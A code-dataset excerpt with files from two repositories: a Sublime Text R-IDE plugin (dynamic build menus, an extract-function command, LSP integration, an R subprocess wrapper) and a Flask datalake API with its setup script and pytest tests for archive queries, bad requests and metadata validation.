``` |
{
"source": "jpcirrus/sublime-ide-r",
"score": 2
} |
#### File: ride/buildsys/build.py
```python
import sublime
import sublime_plugin
import copy
import json
import os
import threading
from ..settings import ride_settings
from ..utils import selector_is_active
ride_menu = [
{
"caption": "R-IDE",
"id": "R-IDE",
"children": [
{
"caption": "Extract Function",
"command": "ride_extract_function"
},
{
"caption": "-"
},
{
"caption": "Exec",
"command": "ride_exec"
},
{
"caption": "-"
},
]
}
]
ride_build = {
"keyfiles": ["DESCRIPTION"],
"selector": "source.r, text.tex.latex.rsweave, text.html.markdown.rmarkdown, source.c++.rcpp",
"target": "ride_exec",
"cancel": {"kill": True},
"variants": []
}
def generate_menu(path):
menu = copy.deepcopy(ride_menu)
menu_items = ride_settings.get("menu_items", [])
if menu_items:
menu[0]["children"].insert(2, {"caption": "-"})
for item in reversed(menu_items):
menu[0]["children"].insert(2, item)
exec_items = ride_settings.get("exec_items", [])
for item in exec_items:
caption = item["caption"] if "caption" in item else item["name"]
if "cmd" in item:
args = {
"cmd": item["cmd"],
"selector": item["selector"] if "selector" in item else ""
}
if "file_regex" in item:
args["file_regex"] = item["file_regex"]
if "working_dir" in item:
args["working_dir"] = item["working_dir"]
if "subdir" in item:
args["subdir"] = item["subdir"]
menu[0]["children"].append({
"caption": caption,
"command": "ride_exec",
"args": args
})
else:
menu[0]["children"].append({"caption": caption})
pathdir = os.path.dirname(path)
if not os.path.exists(pathdir):
os.makedirs(pathdir, 0o755)
with open(path, 'w') as json_file:
json.dump(menu, json_file)
def generate_build(path, view):
build = copy.deepcopy(ride_build)
items = ride_settings.get("exec_items", [])
for item in items:
caption = item["caption"] if "caption" in item else item["name"]
if caption == "-":
continue
if "selector" in item and not selector_is_active(item["selector"], view=view):
continue
v = {
"name": caption,
"cmd": item["cmd"]
}
if "file_regex" in item:
v["file_regex"] = item["file_regex"]
if "working_dir" in item:
v["working_dir"] = item["working_dir"]
if "subdir" in item:
v["subdir"] = item["subdir"]
build["variants"].append(v)
pathdir = os.path.dirname(path)
if not os.path.exists(pathdir):
os.makedirs(pathdir, 0o755)
with open(path, 'w') as json_file:
json.dump(build, json_file)
def plugin_unloaded():
menu_path = os.path.join(
sublime.packages_path(), 'User', 'R-IDE', 'Main.sublime-menu')
if os.path.exists(menu_path):
os.unlink(menu_path)
build_path = os.path.join(
sublime.packages_path(), 'User', 'R-IDE', 'R-IDE.sublime-build')
if os.path.exists(build_path):
os.unlink(build_path)
class RideDynamicMenuListener(sublime_plugin.EventListener):
def on_activated_async(self, view):
if view.settings().get('is_widget'):
return
if hasattr(self, "timer") and self.timer:
self.timer.cancel()
if not ride_settings.get("r_ide_menu", False):
return
def set_main_menu():
menu_path = os.path.join(
sublime.packages_path(), 'User', 'R-IDE', 'Main.sublime-menu')
if selector_is_active(view=view):
if not os.path.exists(menu_path):
generate_menu(menu_path)
else:
if os.path.exists(menu_path):
os.remove(menu_path)
self.timer = threading.Timer(0.5, set_main_menu)
self.timer.start()
class RideDynamicBuildListener(sublime_plugin.EventListener):
def on_activated_async(self, view):
if view.settings().get('is_widget'):
return
if not selector_is_active(view=view):
return
if hasattr(self, "timer") and self.timer:
self.timer.cancel()
def set_build():
build_path = os.path.join(
sublime.packages_path(), 'User', 'R-IDE', 'R-IDE.sublime-build')
generate_build(build_path, view=view)
self.timer = threading.Timer(0.5, set_build)
self.timer.start()
```
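The menu entries and build variants above are driven by the `exec_items` list in the R-IDE settings; a sketch of what such a list might look like is shown below, with all commands and values being illustrative assumptions rather than shipped defaults. `generate_menu()` and `generate_build()` read the keys `caption`/`name`, `cmd`, `selector`, `file_regex`, `working_dir` and `subdir`.

```python
# Illustrative "exec_items" value; the R commands and regex are assumptions.
exec_items = [
    {
        "name": "Document package",
        "cmd": ["Rscript", "-e", "devtools::document()"],
        "selector": "source.r"
    },
    # A bare caption becomes a menu separator and is skipped by generate_build().
    {"caption": "-"},
    {
        "caption": "Run tests",
        "cmd": ["Rscript", "-e", "devtools::test()"],
        "selector": "source.r",
        "file_regex": "^(.*?):([0-9]+):([0-9]+)?:? (.*)$",
        "working_dir": "tests"
    }
]
```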
#### File: ride/commands/extract_function.py
```python
import sublime
import sublime_plugin
import tempfile
import re
import os
from ..r import R
from ..utils import selector_is_active
class RideExtractFunctionCommand(sublime_plugin.TextCommand):
def run(self, edit, func_name=None):
if not func_name:
self.view.window().show_input_panel(
"Function name:", "",
lambda x: self.view.run_command("ride_extract_function", {"func_name": x}),
None, None)
return
sels = self.view.sel()
if len(sels) == 0 or len(sels) > 1:
return
region = self.view.sel()[0]
indentation = re.match(
r"^\s*", self.view.substr(self.view.line(region.begin()))).group(0)
if region.empty():
code = self.view.substr(self.view.line(region.begin()))
else:
code = self.view.substr(
sublime.Region(
self.view.line(region.begin()).begin(),
self.view.line(region.end()).end()))
try:
free_vars = self.detect_free_vars(code)
self.view.insert(edit,
self.view.line(region.end()).end(),
"\n{}}}\n".format(indentation))
self.view.insert(edit,
self.view.line(region.begin()).begin(),
"{}{} <- function({}) {{\n".format(
indentation, func_name, ", ".join(free_vars)))
self.view.run_command("indent")
sublime.status_message("Extract function successed.")
except Exception as e:
print(e)
sublime.status_message("Extract function failed.")
def detect_free_vars(self, code):
dfv_path = tempfile.mkstemp(suffix=".R")[1]
data = sublime.load_resource("Packages/R-IDE/ride/commands/detect_free_vars.R")
with open(dfv_path, 'w') as f:
f.write(data.replace("\r\n", "\n"))
f.close()
result = R(
file=dfv_path,
stdin_text=code
).strip()
try:
os.unlink(dfv_path)
except Exception:
pass
return [s.strip() for s in result.split("\n")] if result else []
def is_enabled(self, **kwargs):
view = self.view
if not selector_is_active("source.r", view=view):
return False
if all(s.empty() for s in view.sel()):
return False
return True
```
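For reference, a small sketch of the wrapping that `run()` performs around a selection, using the same format strings as above; the selection, indentation and function name are made up.

```python
# Mirrors the two view.insert() calls in run(): a header line before the selection
# and a closing brace after it. All values below are illustrative.
indentation = "    "
func_name = "shift_one"
free_vars = ["x"]                 # what detect_free_vars() would report for the selection
code = "    y <- x + 1"           # the selected line(s)

header = "{}{} <- function({}) {{\n".format(indentation, func_name, ", ".join(free_vars))
footer = "\n{}}}\n".format(indentation)
print(header + code + footer)
# prints:
#     shift_one <- function(x) {
#     y <- x + 1
#     }
```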
#### File: sublime-ide-r/ride/lsp.py
```python
import sublime
from .settings import ride_settings
from .utils import selector_is_active
UNLOAD_MESSAGE = """
R-IDE: LSP is not installed. Please install it via Package Control.
"""
try:
import LSP # noqa
LSP_FOUND = True
except Exception:
print(UNLOAD_MESSAGE)
LSP_FOUND = False
if LSP_FOUND and sublime.version() > "4000":
from LSP.plugin.core.sessions import AbstractPlugin
class LspRLangPlugin(AbstractPlugin):
@classmethod
def name(cls):
return "rlang"
@classmethod
def configuration(cls):
basename = "LSP-rlang.sublime-settings"
filepath = "Packages/R-IDE/{}".format(basename)
return sublime.load_settings(basename), filepath
@classmethod
def additional_variables(cls):
r_binary_lsp = ride_settings.get("r_binary_lsp", None)
if not r_binary_lsp:
r_binary_lsp = ride_settings.r_binary()
return {"r_binary_lsp": r_binary_lsp}
def plugin_loaded():
pass
elif LSP_FOUND:
from LSP.plugin.core.handlers import LanguageHandler
from LSP.plugin.core.settings import ClientConfig
class LspRLangPlugin(LanguageHandler):
@property
def name(self):
return "rlang"
def __init__(self):
path = ride_settings.get("r_binary_lsp", None)
if not path:
path = ride_settings.r_binary()
self._config = ClientConfig(
name=self.name,
binary_args=[
path,
"--slave",
"-e",
"languageserver::run()"
],
tcp_port=None,
scopes=["source.r", "text.html.markdown.rmarkdown"],
syntaxes=[
"Packages/R/R.sublime-syntax",
"Packages/R-IDE/R Markdown.sublime-syntax"
],
languageId='r',
languages=[],
enabled=False,
init_options=dict(),
settings={
"diagnostics": ride_settings.get("diagnostics", True),
"debug": ride_settings.get("lsp_debug", False)
},
env=ride_settings.ride_env()
)
@property
def config(self):
return self._config
def on_start(self, window):
return selector_is_active(window=window)
def plugin_loaded():
pass
else:
class LspRLangPlugin():
pass
def plugin_loaded():
sublime.message_dialog(UNLOAD_MESSAGE)
```
#### File: sublime-ide-r/ride/r.py
```python
import sublime
import re
import subprocess
from .utils import find_working_dir
from .settings import ride_settings
ANSI_ESCAPE = re.compile(r'(\x9B|\x1B\[)[0-?]*[ -/]*[@-~]')
message_shown = [False]
def R(script=None, file=None, args=None, stdin_text=None,
slave=True, quiet=True, working_dir=None):
cmd = [ride_settings.r_binary()]
if slave:
cmd = cmd + ["--slave"]
elif quiet:
cmd = cmd + ["--quiet"]
if script:
cmd = cmd + ["-e", script]
elif file:
cmd = cmd + ["-f", file]
if args:
cmd = cmd + args
if sublime.platform() == "windows":
# make sure console does not come up
startupinfo = subprocess.STARTUPINFO()
startupinfo.dwFlags |= subprocess.STARTF_USESHOWWINDOW
else:
startupinfo = None
if not working_dir:
working_dir = find_working_dir()
ride_env = ride_settings.ride_env()
try:
p = subprocess.Popen(
cmd,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
cwd=working_dir,
env=ride_env,
startupinfo=startupinfo,
universal_newlines=True)
stdout, stderr = p.communicate(input=stdin_text)
if p.returncode == 0:
return ANSI_ESCAPE.sub('', stdout)
else:
raise Exception(
"Failed to execute RScript with the following output:\n\n{}".format(stderr))
except FileNotFoundError:
if not message_shown[0]:
sublime.message_dialog(
"R binary cannot be found automatically. "
"The path to `R` can be specified in the R-IDE settings.")
message_shown[0] = True
raise Exception("R binary not found.")
``` |
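A small usage sketch of the `R()` helper above; it only works inside the Sublime Text plugin environment (the `ride` package imports the `sublime` module), and the script path below is a placeholder.

```python
# Sketch only: `ride` is this plugin's package, so the import resolves inside Sublime Text.
from ride.r import R

# Run a one-liner; stdout is returned with ANSI escape codes stripped,
# and an exception is raised if R exits non-zero or cannot be found.
print(R(script='cat(R.version.string)'))

# Pipe text to a script on stdin, as ride_extract_function does for detect_free_vars.R.
free_vars = R(file='/path/to/detect_free_vars.R', stdin_text='y <- x + 1')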
{
"source": "jpclark6/datalake",
"score": 2
} |
#### File: api/datalake_api/app.py
```python
import logging
from flask import Flask, jsonify, redirect
from flask_swagger import swagger
import os
import sentry_sdk
from sentry_sdk.integrations.flask import FlaskIntegration
from datalake_api.v0 import v0
from datalake_api import settings
LOGGER = logging.getLogger(__name__)
app = Flask(__name__)
app.config.from_object(settings)
if 'DATALAKE_API_CONFIG' in os.environ:
app.config.from_envvar('DATALAKE_API_CONFIG')
app.register_blueprint(v0)
level = app.config.get('DATALAKE_API_LOG_LEVEL')
if level is not None and not app.debug:
logging.basicConfig(level=level)
logging.getLogger('boto3.resources.action').setLevel(logging.WARN)
sentry_sdk.init(integrations=[FlaskIntegration()])
@app.route('/')
def index():
return redirect("/docs/", code=302)
@app.route("/docs/")
def docs():
return redirect("/static/index.html", code=302)
@app.route("/spec/")
def spec():
swag = swagger(app)
swag['info']['version'] = "0"
swag['info']['title'] = "Datalake API"
swag['info']['description'] = 'Query files in the datalake archive'
return jsonify(swag)
@app.route('/health/')
def health():
return jsonify({})
if __name__ == '__main__':
app.run(debug=True, host='0.0.0.0')
```
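A quick smoke-test sketch for the Flask app above using its built-in test client; it assumes the `datalake_api` package and its settings module import cleanly outside a real deployment (`sentry_sdk.init()` without a DSN is effectively a no-op).

```python
# Exercises only the unauthenticated endpoints defined in app.py.
from datalake_api.app import app

client = app.test_client()
assert client.get('/health/').status_code == 200   # health endpoint returns {}
assert client.get('/').status_code == 302          # root redirects to /docs/
assert client.get('/spec/').status_code == 200     # swagger spec rendered as JSON
```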
#### File: datalake/api/setup.py
```python
from setuptools import setup
from setuptools import distutils
import os
import sys
def get_version_from_pkg_info():
metadata = distutils.dist.DistributionMetadata("PKG-INFO")
return metadata.version
def get_version_from_pyver():
try:
import pyver
except ImportError:
if 'sdist' in sys.argv or 'bdist_wheel' in sys.argv:
raise ImportError('You must install pyver to create a package')
else:
return 'noversion'
version, version_info = pyver.get_version(pkg="datalake_api",
public=True)
return version
def get_version():
if os.path.exists("PKG-INFO"):
return get_version_from_pkg_info()
else:
return get_version_from_pyver()
setup(name='datalake_api',
url='https://github.com/planetlabs/datalake-api',
version=get_version(),
description='datalake_api ingests datalake metadata records',
author='<NAME>',
author_email='<EMAIL>',
packages=['datalake_api'],
install_requires=[
'pyver>=1.0.18',
'memoized_property>=1.0.2',
'simplejson>=3.3.1',
'Flask>=0.10.1',
'flask-swagger==0.2.8',
'boto3==1.1.3',
'sentry-sdk[flask]>=0.19.5',
'blinker>=1.4',
],
extras_require={
'test': [
'pytest==2.7.2',
'flake8==2.5.0',
'moto==0.4.23',
],
},
include_package_data=True)
```
#### File: api/tests/test_archive_querier.py
```python
import pytest
from datalake.common import DatalakeRecord
from datalake.tests import random_metadata
import simplejson as json
from urlparse import urlparse
import time
from datalake_api.querier import ArchiveQuerier, MAX_RESULTS
from conftest import client, YEAR_2010
_ONE_DAY_MS = 24 * 60 * 60 * 1000
# we run all of the tests in this file against both the ArchiveQuerier and the
# HTTP API. To achieve the latter, we wrap up the flask test client in an
# object that looks like an ArchiveQuerier and returns HttpResults.
class HttpResults(list):
def __init__(self, result):
assert result.status_code == 200
self.response = json.loads(result.get_data())
self._validate_response()
records = [HttpRecord(**r) for r in self.response['records']]
super(HttpResults, self).__init__(records)
def _validate_response(self):
for k in ['next', 'records']:
assert k in self.response
self._validate_next_url(self.response['next'])
def _validate_next_url(self, next):
if next is None:
return
parts = urlparse(next)
assert 'cursor=' in parts.query
@property
def cursor(self):
return self.response['next']
class HttpRecord(dict):
def __init__(self, **kwargs):
super(HttpRecord, self).__init__(**kwargs)
self._validate()
def _validate(self):
assert 'http_url' in self
assert self['http_url'].startswith('http')
assert self['http_url'].endswith(self['metadata']['id'] + '/data')
class HttpQuerier(object):
def __init__(self, *args, **kwargs):
self.client = client()
def query_by_work_id(self, work_id, what, where=None, cursor=None):
params = dict(
work_id=work_id,
what=what,
where=where,
)
return self._query_or_next(params, cursor)
def query_by_time(self, start, end, what, where=None, cursor=None):
params = dict(
start=start,
end=end,
what=what,
where=where,
)
return self._query_or_next(params, cursor)
def _query_or_next(self, params, cursor):
if cursor is None:
result = self._do_query(params)
else:
result = self._get_next(cursor)
return HttpResults(result)
def _do_query(self, params):
uri = '/v0/archive/files/'
params = ['{}={}'.format(k, v) for k, v in params.iteritems()
if v is not None]
q = '&'.join(params)
if q:
uri += '?' + q
return self.client.get(uri)
def _get_next(self, cursor):
# the "cursor" is the next URL in this case
# Work around this issue with the flask test client:
# https://github.com/mitsuhiko/flask/issues/968
cursor = '/'.join([''] + cursor.split('/')[3:])
return self.client.get(cursor)
def query_latest(self, what, where):
uri = '/v0/archive/latest/{}/{}'.format(what, where)
result = self.client.get(uri)
if result.status_code == 404:
return None
assert result.status_code == 200
record = json.loads(result.get_data())
return HttpRecord(**record)
@pytest.fixture(params=[ArchiveQuerier, HttpQuerier],
ids=['archive_querier', 'http'])
def querier(request, dynamodb):
return request.param('test', dynamodb=dynamodb)
def in_url(result, part):
url = result['url']
parts = url.split('/')
return part in parts
def in_metadata(result, **kwargs):
m = result['metadata']
return all([k in m and m[k] == kwargs[k] for k in kwargs.keys()])
def all_results(results, **kwargs):
assert len(results) >= 1
return all([in_metadata(r, **kwargs) for r in results])
def result_between(result, start, end):
assert start < end
assert result['metadata']['start'] < result['metadata']['end']
if result['metadata']['end'] < start:
return False
if result['metadata']['start'] > end:
return False
return True
def all_results_between(results, start, end):
assert len(results) >= 1
return all([result_between(r, start, end) for r in results])
def test_query_by_work_id(table_maker, querier, record_maker):
records = []
for i in range(2):
work_id = 'work{}'.format(i)
records += record_maker(work_id=work_id, what='foo')
table_maker(records)
results = querier.query_by_work_id('work0', 'foo')
assert len(results) == 1
assert all_results(results, work_id='work0')
def test_query_work_id_with_where(table_maker, querier, record_maker):
records = []
for i in range(4):
work_id = 'work0'
where = 'worker{}'.format(i)
records += record_maker(work_id=work_id, what='foo', where=where)
table_maker(records)
results = querier.query_by_work_id('work0', 'foo', where='worker0')
assert len(results) == 1
assert all_results(results, work_id='work0', where='worker0')
def test_query_by_time(table_maker, querier, record_maker):
records = []
for start in range(YEAR_2010, YEAR_2010+100, 10):
end = start + 9
records += record_maker(start=start, end=end, what='foo')
table_maker(records)
results = querier.query_by_time(YEAR_2010, YEAR_2010+9, 'foo')
assert len(results) == 1
assert all_results_between(results, YEAR_2010, YEAR_2010+9)
def test_query_by_time_with_where(table_maker, querier, record_maker):
records = []
for i in range(4):
where = 'worker{}'.format(i)
records += record_maker(start=YEAR_2010, end=YEAR_2010+10,
what='foo', where=where)
table_maker(records)
results = querier.query_by_time(YEAR_2010, YEAR_2010+10, 'foo',
where='worker2')
assert len(results) == 1
assert all_results(results, start=YEAR_2010, end=YEAR_2010+10,
where='worker2')
assert all_results_between(results, YEAR_2010, YEAR_2010+10)
def test_deduplicating_time_records(table_maker, querier, record_maker):
# Create a record that definitively spans two time buckets, and make sure
# that we only get one record back when we query for it.
start = YEAR_2010
two_buckets = 2 * DatalakeRecord.TIME_BUCKET_SIZE_IN_MS
end = YEAR_2010 + two_buckets
records = record_maker(start=start, end=end, what='foo')
table_maker(records)
results = querier.query_by_time(start, end+two_buckets, 'foo')
assert len(results) == 1
def test_deduplicating_work_id_records(table_maker, querier, record_maker):
start = YEAR_2010
end = YEAR_2010 + 2 * DatalakeRecord.TIME_BUCKET_SIZE_IN_MS
records = record_maker(start=start, end=end, what='foo', work_id='job0')
table_maker(records)
results = querier.query_by_work_id('job0', 'foo')
assert len(results) == 1
def get_multiple_pages(query_function, query_args):
results = []
cursor = None
while True:
page = get_page(query_function, query_args, cursor)
# Ensure the first page has a cursor
if len(results) == 0:
assert page.cursor is not None
results += page
cursor = page.cursor
if cursor is None:
break
return results
def get_all_pages(query_function, query_args):
pages = []
cursor = None
while True:
page = get_page(query_function, query_args, cursor)
pages.append(page)
cursor = page.cursor
if cursor is None:
break
return pages
def get_page(query_function, query_args, cursor=None):
page = query_function(*query_args, cursor=cursor)
page_len = len(page)
assert page_len <= MAX_RESULTS
# Only allow the last page to be empty
if page.cursor is not None:
assert page_len > 0
return page
def consolidate_pages(pages):
for p in pages[:-1]:
assert p.cursor is not None
return [record for page in pages for record in page]
def test_paginate_work_id_records(table_maker, querier, record_maker):
records = []
for i in range(150):
records += record_maker(what='foo', work_id='job0',
start=1456833600000,
end=1456837200000)
table_maker(records)
pages = get_all_pages(querier.query_by_work_id, ['job0', 'foo'])
assert len(pages) > 1
results = consolidate_pages(pages)
assert len(results) == 150
def evaluate_time_based_results(results, num_expected):
# we tolerate some duplication for time queries because there is no great
# way to deduplicate across pages.
assert len(results) >= num_expected
ids = set([r['metadata']['id'] for r in results])
assert len(ids) == num_expected
def test_paginate_time_records(table_maker, querier, record_maker):
records = []
interval = DatalakeRecord.TIME_BUCKET_SIZE_IN_MS
very_end = YEAR_2010 + 150 * interval
for start in range(YEAR_2010, very_end, interval):
end = start + interval
records += record_maker(start=start, end=end, what='foo')
table_maker(records)
pages = get_all_pages(querier.query_by_time, [YEAR_2010, very_end, 'foo'])
assert len(pages) > 1
results = consolidate_pages(pages)
evaluate_time_based_results(results, 150)
def test_paginate_many_records_single_time_bucket(table_maker, querier,
record_maker):
records = []
interval = DatalakeRecord.TIME_BUCKET_SIZE_IN_MS/150
very_end = YEAR_2010 + DatalakeRecord.TIME_BUCKET_SIZE_IN_MS
for start in range(YEAR_2010, very_end, interval):
end = start + interval
records += record_maker(start=start, end=end, what='foo')
table_maker(records)
pages = get_all_pages(querier.query_by_time, [YEAR_2010, very_end, 'foo'])
assert len(pages) > 1
results = consolidate_pages(pages)
evaluate_time_based_results(results, 150)
def test_paginate_few_records_single_bucket_no_empty_page(table_maker,
querier,
record_maker):
records = []
# Fill one bucket with 2x MAX_RESULTS,
# but we only want the last record.
interval = DatalakeRecord.TIME_BUCKET_SIZE_IN_MS / MAX_RESULTS / 2
very_end = YEAR_2010 + DatalakeRecord.TIME_BUCKET_SIZE_IN_MS
for start in range(YEAR_2010, very_end, interval):
end = start + interval
records += record_maker(start=start, end=end, what='foo')
table_maker(records)
results = get_page(querier.query_by_time, [very_end - interval + 1,
very_end, 'foo'])
evaluate_time_based_results(results, 1)
def test_unaligned_multibucket_queries(table_maker, querier, record_maker):
records = []
# Create 5 records spanning 3 buckets, of which we want the middle 3
records += record_maker(
start=YEAR_2010+DatalakeRecord.TIME_BUCKET_SIZE_IN_MS*1/4,
end=YEAR_2010+DatalakeRecord.TIME_BUCKET_SIZE_IN_MS*1/4+1, what='foo')
records += record_maker(
start=YEAR_2010+DatalakeRecord.TIME_BUCKET_SIZE_IN_MS*3/4,
end=YEAR_2010+DatalakeRecord.TIME_BUCKET_SIZE_IN_MS*3/4+1, what='foo')
records += record_maker(
start=YEAR_2010+DatalakeRecord.TIME_BUCKET_SIZE_IN_MS*6/4,
end=YEAR_2010+DatalakeRecord.TIME_BUCKET_SIZE_IN_MS*6/4+1, what='foo')
records += record_maker(
start=YEAR_2010+DatalakeRecord.TIME_BUCKET_SIZE_IN_MS*9/4,
end=YEAR_2010+DatalakeRecord.TIME_BUCKET_SIZE_IN_MS*9/4+1, what='foo')
records += record_maker(
start=YEAR_2010+DatalakeRecord.TIME_BUCKET_SIZE_IN_MS*11/4,
end=YEAR_2010+DatalakeRecord.TIME_BUCKET_SIZE_IN_MS*11/4+1, what='foo')
table_maker(records)
start = YEAR_2010 + DatalakeRecord.TIME_BUCKET_SIZE_IN_MS * 3 / 4
end = YEAR_2010 + DatalakeRecord.TIME_BUCKET_SIZE_IN_MS * 9 / 4
results = get_page(querier.query_by_time, [start, end, 'foo'])
evaluate_time_based_results(results, 3)
def test_null_end(table_maker, querier, record_maker):
m = {
"start": 1461023640000,
"what": "file",
"version": 0,
"end": None,
"work_id": None,
"path": "/home/foo/file",
"where": "somehost",
"id": "fedcba09876543210",
"hash": "0123456789abcdef"
}
records = record_maker(**m)
table_maker(records)
results = querier.query_by_time(1461023630000, 1461023650000, 'file')
assert len(results) == 1
def test_no_end(table_maker, querier, s3_file_from_metadata):
m = random_metadata()
del(m['end'])
url = 's3://datalake-test/' + m['id']
s3_file_from_metadata(url, m)
records = DatalakeRecord.list_from_metadata(url, m)
table_maker(records)
results = querier.query_by_time(m['start'], m['start'] + 1, m['what'])
assert len(results) == 1
assert results[0]['metadata']['end'] is None
def test_no_end_exclusion(table_maker, querier, s3_file_from_metadata):
m = random_metadata()
del(m['end'])
url = 's3://datalake-test/' + m['id']
s3_file_from_metadata(url, m)
records = DatalakeRecord.list_from_metadata(url, m)
table_maker(records)
results = querier.query_by_time(m['start'] + 1, m['start'] + 2, m['what'])
assert len(results) == 0
def _validate_latest_result(result, **kwargs):
assert result is not None
for k, v in kwargs.iteritems():
assert result['metadata'][k] == v
def test_latest_happened_today(table_maker, querier, record_maker):
now = int(time.time() * 1000)
records = record_maker(start=now, end=None, what='foo', where='boo')
table_maker(records)
result = querier.query_latest('foo', 'boo')
_validate_latest_result(result, what='foo', where='boo')
def test_no_latest(table_maker, querier):
table_maker([])
result = querier.query_latest('statue', 'newyork')
assert result is None
def test_latest_happened_yesterday(table_maker, querier, record_maker):
yesterday = int(time.time() * 1000) - _ONE_DAY_MS
records = record_maker(start=yesterday, end=None, what='tower',
where='pisa')
table_maker(records)
result = querier.query_latest('tower', 'pisa')
_validate_latest_result(result, what='tower', where='pisa')
def test_latest_many_records_single_time_bucket(table_maker, querier,
record_maker):
now = int(time.time() * 1000)
records = []
bucket = now/DatalakeRecord.TIME_BUCKET_SIZE_IN_MS
start = bucket * DatalakeRecord.TIME_BUCKET_SIZE_IN_MS
interval = DatalakeRecord.TIME_BUCKET_SIZE_IN_MS/150
very_end = start + DatalakeRecord.TIME_BUCKET_SIZE_IN_MS
last_start = very_end - interval
for t in range(start, very_end, interval):
end = t + interval
records += record_maker(start=t, end=end, what='meow', where='tree')
table_maker(records)
result = querier.query_latest('meow', 'tree')
_validate_latest_result(result, what='meow', where='tree',
start=last_start)
def test_latest_creation_time_breaks_tie(table_maker, querier,
record_maker):
now = int(time.time() * 1000)
records = []
bucket = now/DatalakeRecord.TIME_BUCKET_SIZE_IN_MS
start = bucket * DatalakeRecord.TIME_BUCKET_SIZE_IN_MS
interval = DatalakeRecord.TIME_BUCKET_SIZE_IN_MS/150
end = start + interval
table = table_maker([])
for i in range(3):
record = record_maker(start=start,
end=end,
what='meow',
where='tree',
path='/{}'.format(i))
table.put_item(Item=record[0])
# unfortunately moto only keeps 1-sec resolution on create times.
time.sleep(1.01)
result = querier.query_latest('meow', 'tree')
_validate_latest_result(result, what='meow', where='tree',
start=start)
assert result['metadata']['path'] == '/2'
def test_max_results_in_one_bucket(table_maker, querier, record_maker):
now = int(time.time() * 1000)
records = []
bucket = now/DatalakeRecord.TIME_BUCKET_SIZE_IN_MS
start = bucket * DatalakeRecord.TIME_BUCKET_SIZE_IN_MS
end = start
for i in range(MAX_RESULTS):
records += record_maker(start=start,
end=end,
what='boo',
where='hoo{}'.format(i))
table_maker(records)
pages = get_all_pages(querier.query_by_time, [start, end, 'boo'])
results = consolidate_pages(pages)
assert len(results) == MAX_RESULTS
def test_2x_max_results_in_one_bucket(table_maker, querier, record_maker):
now = int(time.time() * 1000)
records = []
bucket = now/DatalakeRecord.TIME_BUCKET_SIZE_IN_MS
start = bucket * DatalakeRecord.TIME_BUCKET_SIZE_IN_MS
end = start
for i in range(MAX_RESULTS * 2):
records += record_maker(start=start,
end=end,
what='boo',
where='hoo{}'.format(i))
table_maker(records)
pages = get_all_pages(querier.query_by_time, [start, end, 'boo'])
results = consolidate_pages(pages)
assert len(results) == MAX_RESULTS * 2
```
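The pagination helpers above (`get_page`, `get_all_pages`, `consolidate_pages`) only rely on a query callable that accepts `cursor=...` and returns a list-like page with a `cursor` attribute, where `None` marks the last page. The stand-alone sketch below restates that contract with a fake query; the class and data are made up for illustration.
```python
# Stand-alone illustration of the cursor-pagination contract assumed above:
# pages are list-like, carry a .cursor attribute, and the last page has
# cursor=None. The fake query and its data are illustrative only.
class FakePage(list):
    def __init__(self, items, cursor):
        super(FakePage, self).__init__(items)
        self.cursor = cursor


def fake_query(what, cursor=None):
    data = {
        None: (['r1', 'r2'], 'page2'),
        'page2': (['r3'], None),
    }
    items, next_cursor = data[cursor]
    return FakePage(items, next_cursor)


def drain_pages(query_function, query_args):
    pages, cursor = [], None
    while True:
        page = query_function(*query_args, cursor=cursor)
        pages.append(page)
        cursor = page.cursor
        if cursor is None:
            break
    return pages


assert [r for p in drain_pages(fake_query, ['foo']) for r in p] == ['r1', 'r2', 'r3']
```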
#### File: api/tests/test_bad_queries.py
```python
import simplejson as json
import base64
def get_bad_request(client, params):
uri = '/v0/archive/files/'
q = '&'.join(['{}={}'.format(k, v) for k, v in params.iteritems()])
if q:
uri += '?' + q
res = client.get(uri)
assert res.status_code == 400
response = json.loads(res.get_data())
assert 'code' in response
assert 'message' in response
return response
def test_no_parameters(client):
res = get_bad_request(client, {})
assert res['code'] == 'NoArgs'
def test_no_what_parameter(client):
res = get_bad_request(client, {'start': 123})
assert res['code'] == 'NoWhat'
def test_no_work_id_or_interval(client):
res = get_bad_request(client, {'what': 'syslog'})
assert res['code'] == 'NoWorkInterval'
def test_work_id_and_start(client):
params = {
'what': 'syslog',
'work_id': 'work123',
'start': 123
}
res = get_bad_request(client, params)
assert res['code'] == 'InvalidWorkInterval'
def test_work_id_and_end(client):
params = {
'what': 'syslog',
'work_id': 'work123',
'end': 345
}
res = get_bad_request(client, params)
assert res['code'] == 'InvalidWorkInterval'
def test_start_without_end(client):
params = {
'what': 'syslog',
'start': 123
}
res = get_bad_request(client, params)
assert res['code'] == 'InvalidWorkInterval'
def test_end_without_start(client):
params = {
'what': 'syslog',
'end': 345
}
res = get_bad_request(client, params)
assert res['code'] == 'InvalidWorkInterval'
def test_invalid_start(client):
params = {
'what': 'syslog',
'start': 'notaninteger',
'end': 123
}
res = get_bad_request(client, params)
assert res['code'] == 'InvalidTime'
def test_invalid_end(client):
params = {
'what': 'syslog',
'end': 'notaninteger',
'start': 123
}
res = get_bad_request(client, params)
assert res['code'] == 'InvalidTime'
def test_start_after_end(client):
params = {
'what': 'syslog',
'end': 100,
'start': 200,
}
res = get_bad_request(client, params)
assert res['code'] == 'InvalidWorkInterval'
def test_invalid_cursor(client):
params = {
'what': 'syslog',
'start': 100,
'end': 200,
'cursor': 'foobar',
}
res = get_bad_request(client, params)
assert res['code'] == 'InvalidCursor'
def test_bad_cursor_valid_json(client):
cursor = base64.b64encode('{"valid": "json", "invalid": "cursor"}')
params = {
'what': 'syslog',
'start': 100,
'end': 200,
'cursor': cursor,
}
res = get_bad_request(client, params)
assert res['code'] == 'InvalidCursor'
```
#### File: datalake/tests/test_metadata.py
```python
import pytest
from dateutil.parser import parse as dateparse
from datalake.common import Metadata, InvalidDatalakeMetadata, \
UnsupportedDatalakeMetadataVersion
def test_version_default(basic_metadata):
del(basic_metadata['version'])
m = Metadata(basic_metadata)
assert 'version' in m
assert m['version'] == 0
def test_unsupported_version(basic_metadata):
basic_metadata['version'] = '100'
with pytest.raises(UnsupportedDatalakeMetadataVersion):
Metadata(basic_metadata)
def test_normalize_date(basic_metadata):
basic_metadata['start'] = '2015-03-20'
m = Metadata(basic_metadata)
assert m['start'] == 1426809600000
def test_invalid_date(basic_metadata):
basic_metadata['end'] = 'bxfl230'
with pytest.raises(InvalidDatalakeMetadata):
Metadata(basic_metadata)
def test_id_gets_assigned(basic_metadata):
m = Metadata(basic_metadata)
assert 'id' in m
assert m['id'] is not None
def test_none_for_required_field(basic_metadata):
basic_metadata['where'] = None
with pytest.raises(InvalidDatalakeMetadata):
Metadata(basic_metadata)
